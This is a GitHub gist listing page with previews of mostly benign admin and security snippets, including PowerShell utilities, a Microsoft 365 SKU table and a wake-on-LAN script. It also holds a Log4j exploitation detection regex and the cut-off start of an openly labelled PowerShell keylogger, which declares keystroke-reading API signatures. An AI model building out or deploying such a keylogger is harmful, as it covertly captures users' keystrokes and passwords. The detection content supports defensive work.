Skip to content

Instantly share code, notes, and snippets.

View chadmando's full-sized avatar

chadmando

23 followers · 131 following
View GitHub Profile
@Neo23x0
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/
@sba923
sba923 / ConvertFrom-WingetStdout.ps1
Last active October 28, 2024 16:00
Convert winget output to PowerShell objects
# this is one of Stéphane BARIZIEN's public domain scripts
# the most recent version can be found at:
# https://gist.github.com/sba923/7924b726fd44af91d18453ee595e6548#file-convertfrom-wingetstdout-ps1
#requires -version 7
# This crude script converts the output of the winget.exe executable into an array of PowerShell objects
# usage: winget <args> | ConvertFrom-WingetStdout.ps1
#
# examples of application:
@chadmando
chadmando / get-quarantinedmessages.ps1
Created February 23, 2022 17:04
Find all quarantined messages from the last week for all users. Results are grouped by users to make finding messages for specific users easier.
# Must be connected to Exchange Online
# Gets all Quarantined messages from the last week
# Results are grouped by recipient
Get-MessageTrace -EndDate (Get-Date) -StartDate (Get-Date).adddays(-7) -Status Quarantined |
Sort-Object -Property RecipientAddress |
Format-Table -GroupBy RecipientAddress
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active April 11, 2025 22:49
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@mczerniawski
mczerniawski / Microsoft 365 SKU FriendlyNames
Created January 28, 2021 19:30
ProductName;LicensePartNumber;LicenseSKUID
APP CONNECT IW;SPZA_IW;8f0c5670-4e56-4892-b06d-91c085d7004f
Microsoft 365 Audio Conferencing;MCOMEETADV;0c266dff-15dd-4b49-8397-2bb16070ed52
AZURE ACTIVE DIRECTORY BASIC;AAD_BASIC;2b9c8e7c-319c-43a2-a2a0-48c5c6161de7
AZURE ACTIVE DIRECTORY PREMIUM P1;AAD_PREMIUM;078d2b04-f1bd-4111-bbd4-b4b1b354cef4
AZURE ACTIVE DIRECTORY PREMIUM P2;AAD_PREMIUM_P2;84a661c4-e949-4bd2-a560-ed7766fcaf2b
AZURE INFORMATION PROTECTION PLAN 1;RIGHTSMANAGEMENT;c52ea49f-fe5d-4e95-93ba-1de91d380f89
DYNAMICS 365 CUSTOMER ENGAGEMENT PLAN ENTERPRISE EDITION;DYN365_ENTERPRISE_PLAN1;ea126fc5-a19e-42e2-a731-da9d437bffcf
DYNAMICS 365 FOR CUSTOMER SERVICE ENTERPRISE EDITION;DYN365_ENTERPRISE_CUSTOMER_SERVICE;749742bf-0d37-4158-a120-33567104deeb
DYNAMICS 365 FOR FINANCIALS BUSINESS EDITION;DYN365_FINANCIALS_BUSINESS_SKU;cc13a803-544e-4464-b4e4-6d6169a138fa
@TheFreeman193
TheFreeman193 / Updatable Help on GitHub Pages.md
Last active April 1, 2022 21:09
Using GitHub Pages as a container for PowerShell Updatable Help

Using GitHub pages as a container for PowerShell Updatable Help

Introduction

The PowerShell updatable help system is a useful, if not under-utilised, way to supply up-to-date support documentation for your module. While its implementation and ongoing support from Microsoft for native PowerShell modules is questionable (in my opinion) to begin with, it remains under-used and, in many cases, an unrecognised method of supplying updates to help documentation. This may be, in part, related to the complicated way in which PowerShell is

@cedriczirtacic
cedriczirtacic / wol.py
Created February 12, 2019 16:11
wake-on-lan using scapy
from scapy.sendrecv import send
from scapy.layers.inet import *
from binascii import unhexlify
import sys
magic = ''
for h in sys.argv[1].split(':'): magic += unhexlify(h);
send(IP(dst="255.255.255.255")/UDP(dport=9)/Raw(load=(chr(0xff)*6 + magic*16)))
@MarkBaggett
MarkBaggett / 1 - pythons_sinister_secrets.md
Last active April 16, 2023 21:37
Come To The Darkside - Pythons Sinister Secrets
@psignoret
psignoret / Get-AzureADPSPermissions.ps1
Last active March 14, 2025 21:23
Script to list all delegated permissions and application permissions in Microsoft Entra ID
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.
#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" }
<#
@dasgoll
dasgoll / gist:7ca1c059dd3b3fbc7277
Created December 11, 2015 16:44
Simple Windows Keylogger using PowerShell
#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
# Signatures for API Calls
$signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]